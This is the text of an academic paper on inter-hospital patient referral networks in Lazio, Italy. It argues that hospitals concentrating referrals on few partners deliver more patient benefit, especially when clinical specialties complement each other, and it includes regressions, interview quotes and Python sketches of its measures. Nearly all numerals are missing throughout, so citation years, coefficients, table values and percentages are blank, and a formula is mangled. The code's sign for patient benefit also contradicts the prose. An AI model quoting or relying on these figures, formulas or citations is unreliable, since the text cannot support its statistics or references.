however, the interests of providers and their customers are usually imperfectly aligned. then, providers have leeway to disregard the benefit of the customers in their network relations, or even to act against it. in the milder of such scenarios, a fully booked hotel whose management is linked to another hotel by friendship relations may refer potential customers to that partner hotel (ingram and roberts, ); thus, steering them away from better competing offers. the more drastic scenarios have attracted economists’ attention since the days of adam smith, who famously commented that “people of the same trade seldom meet together, even for merriment and diversion, but the conversation ends in a conspiracy against the public, or in some contrivance to raise prices” (smith, [ ] : ). modern research examines similar designs by “people of the same trade” under the rubric of organized special interests (boies, ; grier et al., ) or collusion (rotemberg and saloner, ). when providers’ outcomes are loosely related to clients’ outcomes, two categories of factors may motivate organizations to jointly improve clients’ outcomes. first, organizations may be motivated by external pressures. most obviously, such pressure may come from antitrust regulators explicitly tasked with connections preventing and punishing collaboration that is harmful to clients. professional associations or accreditation agencies may also exert external pressure on providers to adopt service standards above and beyond government regulations (durand and mcguire, ; ruef and scott, ), including standards that regulate providers’ collaboration (cohen and hilligoss, ; patterson, ). furthermore, competitive pressure may impel providers to jointly benefit clients, e.g. 
by forming alliances that improve services and cut prices (brueckner and whalen, ; morrish and hamilton, ). second, providers may be intrinsically motivated to provide good customer experience. research has highlighted a secular sense of calling − that is, con- struing work as a fulfilling, socially useful activity − and shown the role of calling in sustaining the quality of ser- vice (bunderson and thompson, ; wrzesniewski et al., ; wuyts et al., ). individuals or organi- zations driven by a sense of calling may collaboratively craft work routines that lead to better service quality (leana et al., ). enabling network features no matter how motivated providers are to put their network ties in the service of clients, they can only do so if their own and their network partners’ capabilities can be joined in ways that produce better client service (wuyts et al., ). without denying the importance of motivational factors, we therefore shift the focus to the role of network features that unlock providers’ capabilities to jointly benefit clients. we extend the basic insight of network theory that individuals’ and organizations’ outcomes depend on features of the networks in which they are embedded (granovetter, ; borgatti and halgin, ), positing that network features may also shape the outcomes that organizations produce for their clients. network features enabling organizational outcomes an extensive, vibrant literature has documented features of organizations’ ego networks that enable beneficial organizational outcomes. for example, a balanced mix of strong and weak ties in a firm’s network has been shown to improve its survival chances (uzzi, ). there is evidence that firms that are well-connected (central) in their industry’s overall network attain better performance (powell et al., ; tan et al., ), and so do firms whose network partners are diverse (baum et al., ). studies found that organizations’ innovation performance is better when their networks bridge between industry peers (soda, ) and when they have fewer ties connecting them to competitors through intermediaries (pahnke et al., ). networks that connect organizations to disconnected, non- redundant partners have been shown to be advan- tageous to organizations’ performance in uncertain, entrepreneurial environments, while networks that connect to highly interconnected partners are advan- tageous in stable environments (baum et al., ; rowley et al., ). relational exclusivity as an enabler of client outcomes service providers routinely shape the outcomes not only for themselves but also for their clients. given the amply evidenced potential of beneficially structured networks to create economic value for providers, we suggest that features of providers’ networks have a comparable potential to shape the benefits of their clients. rather than attempt to develop an exhaustive theory of providers’ ego network features that are favorable to client outcomes, our study takes an early step toward such theory by identifying one favorable feature, relational exclusivity. providers’ network relations are exclusive to the extent that they are concentrated to few select partners rather than evenly spread across available partners (see figure for illustration). 
we argue that providers linked to the network through exclusive relations − sometimes synonymously referred to as embedded relations (uzzi, ; shipilov, ) − better cater to client needs because such relations facilitate providers’ awareness and use of the partners’ client service capabilities . theory suggests two reasons why relational exclusivity helps develop awareness of partners’ capabilities to serve clients. first, exclusive commit- ment to a limited set of network partners generates, and is generated by, mutual trust (granovetter, ; gulati, ; zaheer and venkatraman, ). partners who develop trust are more willing to mutually disclose information without fearing harmful consequences (levin and cross, ; lui and ngo, ; mayer et al., ). openness about an organization’s shortcomings in client service is particularly helpful in despite the affinity between relational exclusivity and granovetter’s ( ) notion of embeddedness, we avoid treating the two concepts as equivalent because alterna- tive operationalizations of embeddedness have been sug- gested (e.g. moody and white, ). clients’ outcomes from providers’ networks informing its partners how they can assist its clients. for example, firms more fully disclose their products’ typical problems to external customer support partners who they have trusted relational ties to; awareness of the problems in turn helps such partners provide good customer support (wuyts et al., ). similarly, clinical history paperwork that accompanies patients referred between hospitals may reveal shortcomings in the referring hospital’s treatment (with potential reputational and legal repercussions) − but the shortcomings also suggest what the receiving hospital can do for the patient that the sending hospital could not (iwashyna and courey, ; lomi and pallotti, ). thus, by enabling trust-based disclosure, relational exclusivity better positions providers to combine their capabilities in ways that benefit clients. second, exclusive relations help partners over- come obstacles to knowledge absorption. a substan- tial share of knowledge that collaborators need to complete joint tasks is tacit, complex or both. the absorption of tacit or complex knowledge depends on assistance that its source offers. because partners in embedded, exclusive relations have more willingness and shared time to assist each other in absorbing knowledge, and to ask for assistance, such relations have proved instrumental for tacit and complex organizational learning (szulanski, ; uzzi, ). the notion that exclusive relations help convey and retain tacit knowledge has been invoked to explain the very existence of organizations (kogut and zander, ). insofar as the use of exclusive relations to link to the network facilitates the absorption of knowledge that may benefit organizations, we expect it to have the same effect on knowledge that helps them jointly benefit their clients. the relationship between providers’ relational exclusivity and the benefits of their service recipients may be summarized as follows: h . a provider generates more benefit to service recipients through its partnership ties to the extent that the provider concentrates relations to few partners rather than spreads them out among many partners. complementary client service capabilities our argument is premised on the logic of comple- mentary capabilities. 
we argued that relational exclusivity unlocks the potential of partnering orga- nizations to benefit clients because it improves their knowledge and use of network partners’ complementary client service capabilities. this logic implies that the hypothesized effect of relational exclusivity varies with the extent to which the focal providers’ and its partners’ capabilities can be combined to benefit clients. if providers have few complementary capabilities, their networks can produce little benefit to their clients, no matter how they might be structured. conversely, if the partners’ complementarity is high, beneficially structured networks will help them direct their clients toward partners’ capabilities that they lack. to probe the supporting logic of our first hypothesis, we examined the following additional hypothesis: h . the positive effect of relational exclusivity on client benefit is stronger to the extent that the providers’ and its partners’ client service capabilities are complementary. the empirical setting we test our hypotheses using data that we collected on patient referral relations in a network of hospital figure : high and low relational exclusivity. note: relational exclusivity is an attribute of the black node. line thickness is proportional to relation intensity. high relational exclusivity low relational exclusivity connections organizations. our choice of health care as the empirical setting is consistent with our focus on capability-related causal mechanisms. because of the ethical and legal norms that mandate concern for patient well-being, motivational determinants of the quality of client service in health care may vary little and be poorly generalizable to other contexts. in contrast, health care providers’ use of partners’ complementary capabilities to benefit a patient is not mandated; it is subject to the effects of providers’ network features, as it is in other types of services. the health care system in lazio lazio is the large italian region with the center in rome and a population of almost . million. the health care system in lazio is part of italy’s national health service (inhs), a publicly funded health care system providing universal insurance coverage to all citizens and legal residents. during the four-year period covered by our data, the system had facilities in lazio, of which were publicly owned hospitals. the remaining were accredited private hospitals and contracting ambulatory care organizations. all facilities, regardless of the ownership form, accepted universal health insurance. the system underwent reforms in the s, aimed at improving overall performance. among other changes, the reforms introduced a diagnosis- based system of reimbursement of hospital services, established financial performance criteria and made hospital ceos responsible for meeting them, gave patients more freedom to choose health care providers, and made funding more directly dependent on the amount and quality of provided services. the reforms created a quasi-market designed to sustain the equity benefits of traditional public healthcare systems while also reaping the potential efficiency gains from competition (barretta, ). in this hybrid arrangement, accredited hospitals compete for patients and inhs budget allocations but may also cooperate in the interest of public health (lomi and pallotti, ). 
inter-hospital patient referral inter-hospital referral of patients is a common collaborative activity for health care institutions (iwashyna and courey, ; lomi and pallotti, ). we focus on the referral of inpatients under nonemergency conditions. engaging in such referral is voluntary for hospitals − they have the discretion to make, accept and refuse referral requests. there are no regulations prescribing the choice of collaboration partners or requiring that hospitals give reasons for acceptance or refusal. nor may a hospital be forced to refer a patient simply because it lacks beds or admits no patients with particular symptoms or condition − by definition, inpatient referral may only happen if the patient was previously admitted to the sending hospital. as hospitals face few external pressures in nonemergency referral decisions, the referral destinations are determined, alongside care quality, by informal, hospital-specific norms and routines (bosk et al., ; veinot et al., ). patient referral networks are uniquely suited to our empirical purposes for at least four reasons. first and foremost, patient referral data can detect the particular benefits that accrue to care recipients from relations between providers, rather than risk confounding these benefits with those that come from other sources. when a patient is referred to a hospital delivering services of higher quality, we know that the improvement in service quality that she experiences is due to a particular instance of interorganizational collaboration. in contrast, in most other instances where clients may benefit or suffer from interorganizational relations, no quantitative method can reliably link a client’s outcome to any particular relation. this link can only be established in in-depth case study (provan and milward, ) or indirectly inferred from correlation between network variables and client outcomes (hochberg et al., ). second, our statistical inference is immune to selection biases resulting from service recipients’ actions because patients surrender control at admission over interhospital referrals. patients cannot choose where they will be referred; like any other treatment decision, referral remains a prerogative of the hospital in charge of the patient. third, the exclusivity of patient referral relations exhibits wide and meaningful variation, necessary for the test of h . some hospitals’ patient referrals are episodic acts, negotiated and coordinated ad hoc for each specific instance. in other cases, patient referral is a manifestation of an underlying rich and lasting, exclusive interorganizational partnership. such partnerships involve well-developed knowledge exchange routines, trust and joint decision making (bosk et al., ; gittell and weiss, ). they predate and transcend specific instances of referral. finally, the particular methodological advantage of the inpatient referral network in lazio is that it is largely contained within the region. in the period that we studied, only between and percent of lazio’s inpatient referrals crossed the region’s boundary (marrocu et al., , p. ). network boundary specification, an endemic problem in network studies, is thus not a major concern in our data. clients’ outcomes from providers’ networks data our quantitative data come from the regional hospital information system database maintained by the public health agency of lazio. 
the database holds information on attributes of the hospitals in the region accredited by the inhs and on referral patient flows between them, recorded annually from through . we used data on all of these hospitals except two that referred no patients. the data set records a referral only if the receiving hospital admitted the referred patient. to improve our contextual understanding of patient referral in lazio, we conducted semi-structured interviews with region’s physicians and hospital administrators. measures data structure and model our data set has a four-wave panel structure: the variables are measured yearly at the level of the hospital. standard errors may be biased when regression models are estimated with panel data sets because the residuals are subject to correlation across repeated observations within organizations and within periods. to preclude such bias, the standard errors in the linear regression models reported below were corrected for hospital-level and year-level clustering (cameron et al., ; thompson, ). the correction algorithm calculates standard errors in three cluster- robust covariance matrices: one with clustering by the first variable (hospital), one with clustering by the second variable (year), and one with clustering by their intersection. the standard errors are then estimated with the matrix computed by summing the first two matrices and subtracting the third (cameron et al., ). unlike in fixed and random effects models, standard errors corrected for clustering by two variables are unbiased even when the effect of one clustering variable varies across levels of the other (petersen, ) . dependent variable: patient benefit patients benefit from interhospital referral networks to the extent that the receiving hospitals provide higher quality care than the sending hospitals (bosk et al., ; iwashyna et al., ; lomi et al., ). the risk-standardized readmission rate (rsrr) is a common measure of the quality of hospital care (axon and williams, ; horwitz et al., ; landrum and weinrich, ). when patients are frequently readmitted to a hospital, this attests that the hospital fails to cure the conditions that its patients need treatment for; conversely, if the readmission rate is low, the hospital routinely succeeds in curing its patients. the inhs officially defines hospital readmission as admission of the patient into the hospital from which that patient was discharged within previous days for the same condition. to make this raw readmission rate comparable across hospitals, it is standardized by the types of medical procedures offered by the hospital and the complexity of cases treated. cases of planned readmission (such as chemotherapy, hiv and kidney dialysis) are excluded from the calculation of the rsrr. rsrr is routinely used by the inhs, medicare, medicaid and the hospital quality alliance to measure patient outcomes in a way that is comparable across hospitals with different specialization profiles (centers for medicare and medicaid services, ). unlike the mortality rate, the other common measure of care quality, rsrr is applicable to non-life-threatening conditions. rsrr has passed construct validity tests that compared it to hospital rankings and patient satisfaction (boulding et al., ; halfon et al., ; horwitz et al., ). it also responds to interventions aiming to improve care quality (coleman et al., ). despite its advantages and wide use, rsrr is not a perfect metric. 
it is a coarser measure of care quality than other possible readmission measures unavailable to us, such as department-level readmission rates. also, the precise definition of unplanned readmission and the methods of cross-hospital standardization are a matter of debate in medical research (axon and williams, ). we embrace rsrr in awareness of these imperfections. following lomi et al. ( ), we conceptualize patient benefit from a single instance of referral as the difference between the quality of care in the hospital that receives and in the hospital that sends the patient. because lower readmission rates correspond to better quality, we subtract the rsrr in the sending hospital from that in the receiving hospital. our dependent variable brings this patient benefit measure to the level of the hospital by summing these differences over all the hospital’s referrals made or received in the year. the higher the sum is, the greater is the total patient benefit from the hospital’s patient referral relations. this correction may be used with any pair of variables that make observations non-independent and with a variety of regression models. the stata code that implements correc- tion for clustering on two variables in linear, probit, logit and tobit models is available at www.kellogg.northwestern.edu/ faculty/petersen/htm/papers/se/se_programming.htm. connections because hospital and interhospital factors in a given year (rather than any prior year) are most relevant to the patient referral outcomes in that year, our dependent variable is not lagged. independent variables relational exclusivity first-order network coupling captures the extent to which organizations concentrate their relations to few partners rather than spread them out among many potential partners (uzzi, ). researchers have used first-order network coupling in various contexts, adapting it to the type of network at hand (see e.g. shipilov, ; shipilov et al., ). in a network of patient referrals, the measure captures the extent to which hospitals concentrate their referrals to few of the many potential partner hospitals. it is computed as ∑j j= p ij , where p ij is the fraction of hospital i’s total patient referral flow accounted by referrals to or from partner hospital j, and j is the count of partner hospitals in i’s referral network. when the measure is close to , the hospital spreads out its patient referral relations among many partner hospitals, without clearly preferring some over others. when the measure is at its extreme value of , the focal hospital has an exclusive referral relation with one partner. complementarity of capabilities one hospital may complement another’s patient care capabilities by having clinical expertise or equipment that the other lacks. for example, when a hospital lacking an oncology unit refers a patient with cancer symptoms to one that specializes in oncology, the hospitals are leveraging their complementarity for patient benefit. in our context, such complementarity is measurably reflected in hospitals’ clinical speci alty profiles. the profile of the focal hospital is complementary with its referral partners to the extent that its partners lack its clinical specialties and it lacks theirs. this type of complementarity is captured by the jaccard distance (one minus the ratio of overlapping specialties to all unique specialties that either partner has) between a hospital and its partner. 
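to make the measures concrete, the sketch below illustrates in python how the patient benefit, relational exclusivity, and clinical complementarity measures described in this section can be computed from a referral edge list. it is an illustration with hypothetical data and hypothetical names, not the code used for the analyses; the per-referral benefit is signed so that routing a patient toward a hospital with a lower (better) readmission rate counts as positive.

```python
from collections import defaultdict

def patient_benefit(hospital, referrals, rsrr):
    """Hospital-year patient benefit: sum, over the hospital's referrals sent or
    received, of the gap in care quality between sending and receiving hospital."""
    total = 0.0
    for sender, receiver, n_patients in referrals:
        if hospital in (sender, receiver):
            total += n_patients * (rsrr[sender] - rsrr[receiver])
    return total

def relational_exclusivity(hospital, referrals):
    """First-order network coupling: sum over partners of the squared share of the
    hospital's total referral flow accounted for by that partner."""
    flow = defaultdict(float)
    for sender, receiver, n_patients in referrals:
        if sender == hospital:
            flow[receiver] += n_patients
        elif receiver == hospital:
            flow[sender] += n_patients
    total = sum(flow.values())
    return sum((f / total) ** 2 for f in flow.values()) if total else 0.0

def clinical_complementarity(hospital, partners, specialties):
    """Average Jaccard distance between the hospital's set of clinical specialties
    and each referral partner's set."""
    own = specialties[hospital]
    d = [1 - len(own & specialties[p]) / len(own | specialties[p]) for p in partners]
    return sum(d) / len(d) if d else 0.0

# Hypothetical data for three hospitals A, B, C: (sender, receiver, patients).
referrals = [("A", "B", 30), ("A", "C", 5), ("B", "A", 10)]
rsrr = {"A": 0.12, "B": 0.09, "C": 0.15}
specialties = {"A": {"cardiology", "oncology"},
               "B": {"oncology", "neurology"},
               "C": {"orthopedics"}}
print(relational_exclusivity("A", referrals))                  # ~0.80: flow concentrated on B
print(clinical_complementarity("A", ["B", "C"], specialties))  # ~0.83
print(patient_benefit("A", referrals, rsrr))
```

the same caveat applies to the following sketch of the two-way clustering correction described above (cameron et al.): cluster-robust covariance matrices are computed by hospital, by year, and by their intersection, and the first two are summed while the third is subtracted.

```python
import numpy as np

def cluster_cov(X, u, groups, bread):
    """One-way cluster-robust covariance: bread @ (sum of per-cluster score outer
    products) @ bread."""
    groups = np.asarray(groups)
    meat = np.zeros((X.shape[1], X.shape[1]))
    for g in np.unique(groups):
        score = X[groups == g].T @ u[groups == g]
        meat += np.outer(score, score)
    return bread @ meat @ bread

def twoway_clustered_se(X, y, hospital, year):
    """OLS with standard errors clustered by hospital and by year. X should include
    a column of ones for the intercept; small-sample adjustments are omitted."""
    bread = np.linalg.inv(X.T @ X)
    beta = bread @ X.T @ y
    u = y - X @ beta
    inter = np.array([f"{h}|{t}" for h, t in zip(hospital, year)])  # intersection clusters
    V = (cluster_cov(X, u, hospital, bread)
         + cluster_cov(X, u, year, bread)
         - cluster_cov(X, u, inter, bread))
    return beta, np.sqrt(np.diag(V))
```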
thus, we compute the measure of clinical complementarity as the average jaccard distance between the focal hospital and all its partners. there are clinical specialties represented in the sample.

control variables
we included a set of control variables to minimize the threat of omitted variable bias. to account for larger hospitals' greater capacity to benefit patients, we included the hospital size, expressed as the number of beds. the average number of beds among the focal hospital's referral partner hospitals captures the same capacity in the hospital's partnership network. we controlled for the hospital's occupancy rate, to account for the possibly higher propensity to refer patients when the hospital has a shortage of available beds. because we expect geographic proximity to affect both the patient benefits and the networks that the hospitals create, we controlled for the average geographic distance between the focal hospital and its referral partners, weighted by the total yearly patient flow between them. furthermore, we controlled for the ownership form, distinguishing private from public hospitals, to account for private organizations' higher propensity to focus on economic performance at the expense of client benefit (hansmann, ; baum et al., ). the hospital attributes in our model that are potentially related to patient benefit from referrals include the total number of referral patients that the hospital sent and received in the given year, the case mix index (inhs's standard measure of the complexity of the cases treated by the hospital), and the comparative performance index (cpi). the cpi is the annual hospital efficiency score, computed annually by the regional division of the inhs. the cpi captures the relative time that it takes the hospital to successfully treat cases of similar complexity. the index takes the value of for hospitals whose performance is average compared with other hospitals in the region. it is below (above) if the hospital performs above (below) the regional average. we also controlled for the rsrr in the focal hospital. this control is essential because hospitals with a higher readmission rate (i.e. those that provide less effective treatment) are by design more likely to benefit patients when they refer them to another hospital and less likely to do so when they receive referred patients.

table 1 shows the measures' descriptive statistics and correlation matrix. all control variables except the number of referrals made and received are significantly correlated with the dependent variable and at least one main independent variable; exclusion of these variables would therefore subject the model to omitted variable bias.

[table 1. variables in the analysis: descriptive statistics and the correlation matrix. rows: patient benefit; beds in focal hospital; average beds in partner hospitals; occupancy rate; average distance to partners (km); private hospital; referral patients sent in year; referral patients received in year; case mix index; comparative performance index; risk-standardized readmission rate; clinical complementarity with partners; relational exclusivity. columns report each variable's mean, standard deviation, and pairwise correlations. notes: n = hospital-years with non-missing data; cases are missing when hospitals neither send nor receive referred patients. *p < . ; **p < . .]

results
are patients referred to hospitals providing better care?
before examining the determinants of patient referral to hospitals providing better care, it is instructive
figure visualizes the moderating effect of clinical complementarity in model . the vertical axis shows the effect of relational exclusivity on patient benefit at every level of clinical complementarity. the lowest value of this effect is . , which corresponds to the main effect of relational exclusivity. the effect increases as clinical complementarity increases, reaching significance at p = . beyond the th percentile of clinical complementarity. table . the flow of referral patients by year and relative risk-standardized readmission rate. patients referred to hospitals where readmission rate is year lower (better) than in sending hospital higher (worse) than in sending hospital same as in sending hospital , , , , , , , , total , , clients’ outcomes from providers’ networks table . effect of relational exclusivity on patient referral to hospitals with better care quality. linear regression models with two-dimensional clustering of standard errors model model model beds in focal hospital − . ** ( . ) − . ** ( . ) − . ** ( . ) average beds in referral partner hospitals − . * ( . ) − . ( . ) − . * ( . ) occupancy rate − . ** ( . ) − . * ( . ) − . * ( . ) average weighted distance to partners (km) − . ( . ) − . ( . ) − . ( . ) private hospital . ( . ) . ( . ) − . ( . ) case mix index − . ** ( . ) − . ** ( . ) − . ** ( . ) comparative performance index . ( . ) . ** ( . ) . * ( . ) referral patients sent in year < . (< . ) < . (< . ) < . (< . ) referral patients received in year . ** (< . ) . ** (< . ) . ** (< . ) risk-standardized readmission rate − . ** ( . ) − . * ( . ) − . * ( . ) clinical complementarity with partners ≤ . ( . ) − . ** ( . ) relational exclusivity . ** ( . ) . ( . ) clinical complementarity with partners × relational exclusivity . ** ( . ) n r . . . lr χ (relative to previous model) − . ** . ** notes: standard errors, clustered by hospital and year, are in parentheses. the unit of analysis is hospital-year. the intercept is omitted.*p < . ; **p < . . supplementary analyses we performed supplementary analyses to examine two types of potential threat to the validity of our results. first, we checked the robustness of our quantitative findings. second, we examined the transcripts of our interviews with health care professionals to confirm that they understand the main concepts that we measured and consider them when making patient referral decisions. robustness checks because the positive effect of relational exclusivity on organizational outcomes has been shown to peak at an optimal level and then decline (uzzi, ), we examined if our linear specification of this effect was warranted. we tried adding the quadratic term to model . the quadratic term had no significant effect, and we omitted it. we also experimented with adding the quadratic term and its interaction term with clinical complementarity to model . the added terms created multicollinearity and did not improve the fit of model . the interaction of the quadratic term with clinical complementarity was not significant. we also re-estimated models and with the added variable measuring hospitals’ degree of specialization, a herfindahl index summing the squared shares of beds allocated to each clinical specialty. because more specialized hospitals tend to have more exclusive referral relations, models might have confounded the effects of specialization and exclusivity. with the herfindahl index included in models and , both hypothesized effects retained their size and significance. 
the index had no significant effect, did not improve the model fit connections and removed nine observations because of missing specialization data. the results reported in table are remarkably robust to model specification. we reproduced both hypothesized effects in models with fixed hospital and year effects, with correction for clustering on one variable (year or hospital) only, with the huber−white correction, and with uncorrected random effects. we also reproduced all effects when the sample was restricted to hospital partnerships where patient benefit values were positive. all results of robustness checks are available on request. relational exclusivity and complementary capabilities in health professionals’ accounts we used the transcripts of our interviews with health care professionals to verify that physicians and hospital administrators understand and use − at everyday, common-sense level − the concepts that we theorized and measured. our semi-structured interviews preceded the rest of our work on this study and were not intended to bear on its arguments. the objective of the interviews was to elicit first-hand accounts of why and how hospitals refer patients. because we used a convenience sample, the data enable no robust causal inference. nevertheless, the interview evidence added confidence that decision makers in hospitals understand relational exclusivity and complementary capabilities and consider them in making patient referrals. every respondent in our sample was asked “why does your hospital refer patients to other hospitals?” additional unscripted follow-up questions were asked to elicit extended answers to this question. some follow-up questions were asked by email and answers were appended to the transcripts. our respondents, physicians and administrators alike, showed awareness of the role of relational exclusivity. in accordance with our hypotheses, they attested that exclusive relations help hospitals leverage knowledge of mutual complementary capabilities for patient benefit. a physician said: there are a few hospitals that [together] send us […] to percent of the [referral] patients [we receive]. […] apart from geography, [we prefer these hospitals because] they know what we can do for their patients. and, of course, we send our patients to these hospitals whenever needed . he proceeded to explain that exchange of patients with such frequent partner hospitals is easier because all interview quotes are translated from italian. figure : the marginal effect of relational exclusivity across the range of the clinical complementarity variable. note: the % confidence interval shown in grey. the line is thicker where the marginal effect is different from zero at p < . . clients’ outcomes from providers’ networks information about what the partner can do for the patient can be more effectively communicated: in some instances […[ a phone call of minutes is enough [to finalize a patient referral]. […] [such quick decision making] has to do with […] knowledge about resources […] and administrative procedures. previous interaction helps us accumulate such precious knowledge. the administrative director of a large children’s hospital similarly pointed out that procedural know- ledge among frequent referral partners helps the efficiency of the referral: hospitals that send patients more regularly, or with which we have been in touch for a long time, are very good in sending us the right material that lets us fully understand [how we can help with] the clinical case. 
[…] there are partners who know very well what we want to see in their referral requests. and this is not strictly related to the type of patient to be transferred, but rather it is about how they present their request and about the completeness of information. a physician in a major teaching hospital suggested that exclusive relations may not only create aware- ness of complementary care capabilities, but also the confidence that the partner will make these capabilities available when requested: i remember a patient with lung cancer who […] developed an infection. we have no clinical ward for infection diseases at our hospital, so we decided to transfer the patient. […] we chose [hospital x] as partner because they have a good infectious disease department. […] i know they have the expertise and have never refused to receive a patient [from us]. finally, we noted that awareness of complemen- tary capabilities may motivate hospitals not only to send but also to receive referral patients. a physician reported that his hospital “primarily accepts patients coming from another hospital because we have better ability to treat their diseases.” discussion contributions and future directions under what conditions do clients benefit from providers’ partnership networks? our answer builds on the idea that client benefits ensue from providers’ ego-network features that enable the use of mutually complementary capabilities to deliver higher-quality client service. we argued that relational exclusivity improves the providers’ knowledge and use of network partners’ complementary capabilities and thereby helps clients benefit from providers’ network relations. we hypothesized that organizations will be more likely to know their partners’ capabilities and put this knowledge to work for the benefit of the client to the extent that their relations are concentrated among few selected partners. the analysis supported this hypothesis. we also found that the hypothesized effect strengthens as the complementarity of providers’ client service capabilities increases, which supports the notion that relational exclusivity facilitates the use of such capabilities for client benefit. our argument and findings offer two contributions to organizational network theory. first, we offer early evidence that configurations of providers’ networks may not only benefit organizations, as previous network studies amply confirmed, but also deliver benefits to organizations’ clients. second, our study transcends the notion that providers’ networks benefit clients when providers are motivated to serve client needs. we point out that motivation cannot fully account for clients’ benefits from providers’ networks and advocate a theoretical account that embraces the role of providers’ network features that unlock their client service capabilities. these contributions hold out a promise of a fruitful research program examining network features that make providers more or less capable of serving client needs. we start and encourage this research effort. as the emerging literature on clients’ benefits from organizational networks matures, it may fruitfully mirror the earlier theoretical and empirical development of the literature on organizations’ benefits from networks. two pathways in this development have been particularly rich in insight. 
first, research moved from examining the main effects of having ties (mizruchi and stearns, ; uzzi, ; gulati, ) toward contingent theories examining the benefits and drawbacks of networks depending on external environments and tasks at hand (gulati and higgins, ; fleming et al., ). second, studies progressed from focusing on the effects of network structures (coleman et al., ; granovetter, ) toward examining the content of network relations (e.g. emirbayer and goodwin, ). both pathways remain largely untrodden in research on clients’ benefits. future studies may examine how client benefits from networks are contingent on the intensity of competition among providers and on whether providers are for-profit or nonprofit. they may further consider how the structural effects are modified by cross-cultural variation in network relations’ content and by power inequalities between partners. we see our methodological contribution in encou- raging network research to capture the effects of connections interorganizational relations directly, rather than infer such effects from relationships between network variables and outcome variables. our method highlights the distinction between, on the one hand, capturing whether providers refer clients to network partners who offer better-quality service and, on the other hand, examining the correlation between a provider’s ego-network properties and its clients’ outcomes. in the former case, we can say with confidence that we are observing a relational effect: the client was served by a better- quality provider because of the cooperation between specific providers in the network. in the latter case, we cannot rule out that the correlation exists due to unmeasured provider properties that simultaneously affect its networks and client outcomes, such as financial or other resources. similar distinctions apply in all studies of relational outcomes, where only an unmistaken linkage between a relation and its outcomes can safeguard against spurious network effects. practical implications our argument suggests that service recipients’ outcomes may be improved by structuring providers’ network ties in ways that promote the coordinated use of providers’ service capabilities. this opens new ways of improving health care outcomes, particularly by countering the adverse effects of care fragmentation. research has shown that patients are disadvantaged when patient care is spread across poorly coordinated providers and examined the merits of anti-fragmentation policies aimed at internalizing the care within formally organized groups of providers (agha et al., ). our study suggests that promotion of preferred provider-to-provider direct partnerships, rather than organized provider groups, may be a viable alternative anti-fragmentation policy. generalizability and limitations we advocate caution in generalizing our argument or empirical results. this is not because there are evident reasons why relational exclusivity should fail to produce the hypothesized effects beyond health care, or beyond professional services, but because these reasons are largely unexplored. while a close examination of these reasons is beyond our scope, three conditions seem particularly likely to restrict the generalizability of our argument. first, we expect relational exclusivity to generate client benefits only in settings where providers’ capabilities are differentiated. if providers have identical capabilities, their potential to improve products or services by partnering is limited. 
indeed, as our analysis just showed, network mechanisms generate no patient benefits in hospitals whose network partners have similar service capabilities. second, our argument depends on the presence of motivation to deliver good client service. whichever client benefit potential provider networks may create, providers who lack all motivation to deliver good outcomes to clients − most typically in markets with limited competition − will not realize that potential. third, the argument only applies when providers partner in matters of serving client needs. we do not theorize any client outcomes from partnerships established for other purposes, such as joint lobbying or acting against common competitors. a variety of professional services meets the triple scope condition of differentiation, client service motivation, and partnering in matters of service. beside health care, the three conditions are most reliably met in postsecondary education, accounting services, legal aid and venture capital − which all happen to be fields where, similar to health care, referrals of clients (or, in case of education, students) across organizations are common. in contrast, wholesaling commodity producers are not differentiated in capabilities relevant to end-consumer experience and thus fail to meet the first condition. normally, however, we do not expect the presence or absence of any of the three conditions to be a binary contrast, but rather a matter of degree. in most contexts, a dedicated empirical investigation is required to determine whether the scope conditions are sufficiently met for our argument to apply. our study has a number of methodological limitations. first, our empirical scope is limited to a local health care system. while health care has obvious institutional idiosyncrasies, the problem of how collaboration among organizations may benefit their customers remains general. our design would benefit from replication in different contexts, with measures of customer outcomes tailored to the context at hand. second, our measures of care quality are coarser than we would have liked. with fine-grained, preferably patient-level health data, we would be able to go beyond hospital-centered measures such as rsrr and examine transaction- level factors that affect patient outcomes. while access to patient-level information is difficult due to privacy concerns, such information may validate and improve the results of our study. third, referrals are one of many types of interorganizational collaboration that may be potentially consequential for client benefit. we trust that future research will build on clients’ outcomes from providers’ networks our arguments and analysis and will examine the implications of other types of interorganizational collaboration for client benefit. references agha, l., frandsen, b. and rebitzer, j. b. . causes and consequences of fragmented care delivery: theory, evidence, and public policy. working paper no. , national bureau of economic research, cambridge, ma. axon, r. n. and williams, m. v. . hospital readmission as an accountability measure. jama: the journal of the american medical association : – . baker, w. e. and faulkner, r. r. . the social organization of conspiracy: illegal networks in the heavy electrical equipment industry. american sociological review : – . barrera, d. and van de bunt, g. g. . learning to trust: networks effects through time. european sociological review : – . barretta, a. . 
the functioning of co-opetition in the health-care sector: an explorative analysis. scandinavian journal of management : – . baum, j. a., calabrese, t. and silverman, b. s. . don’t go it alone: alliance network composition and startups’ performance in canadian biotechnology. strategic management journal : – . baum, j. a. c., cowan, r. and jonard, n. . does evidence of network effects on firm performance in pooled cross-section support prescriptions for network strategy?. strategic management journal : – . boies, j. l. . money, business, and the state: material interests, fortune corporations, and the size of political action committees. american sociological review : – . borgatti, s. p. and halgin, d. s. . on network theory. organization science : – . bosk, e. a., veinot, t. and iwashyna, t. j. . which patients, and where: a qualitative study of patient transfers from community hospitals. medical care : – . boulding, w., glickman, s. w., manary, m. p., schulman, k. a. and staelin, r. . relationship between patient satisfaction with inpatient care and hospital readmission within days. american journal of managed care : – . brueckner, j. k. and whalen, w. t. . the price effects of international airline alliances. journal of law and economics : – . bunderson, j. s. and thompson, j. a. . the call of the wild: zookeepers, callings, and the double- edged sword of deeply meaningful work. administrative science quarterly : – . cameron, a. c., gelbach, j. b. and miller, d. l. . robust inference with multiway clustering. journal of business and economic statistics : – . centers for medicare and medicaid services . re- admission measures. available at: https://www.qualitynet. org/inpatient/measures/readmission (accessed july , ). cohen, m. d. and hilligoss, p. b. . the published literature on handoffs in hospitals: deficiencies identified in an extensive review. bmj quality & safety : – . coleman, e. a., parry, c., chalmers, s. and min, s. j. . the care transitions intervention: results of a randomized controlled trial. archives of internal medicine : – . coleman, j., katz, e. and menzel, h. . the diffusion of an innovation among physicians. sociometry : – . dibenigno, j. and kellogg, k. c. . beyond occu- pational differences: the importance of cross-cutting de- mographics and dyadic toolkits for collaboration in a u.s. hospital. administrative science quarterly : – . drange, i. . early-career income trajectories among physicians and dentists: the significance of ethnicity. european sociological review : – . durand, r. and mcguire, j. . legitimating agencies in the face of selection: the case of aacsb. organization studies : – . emirbayer, m. and goodwin, j. . network analysis, culture, and the problem of agency. american journal of sociology : – . fleming, l., mingo, s. and chen, d. . collaborative brokerage, generative creativity, and creative success. administrative science quarterly : – . gittell, j. h. and weiss, l. 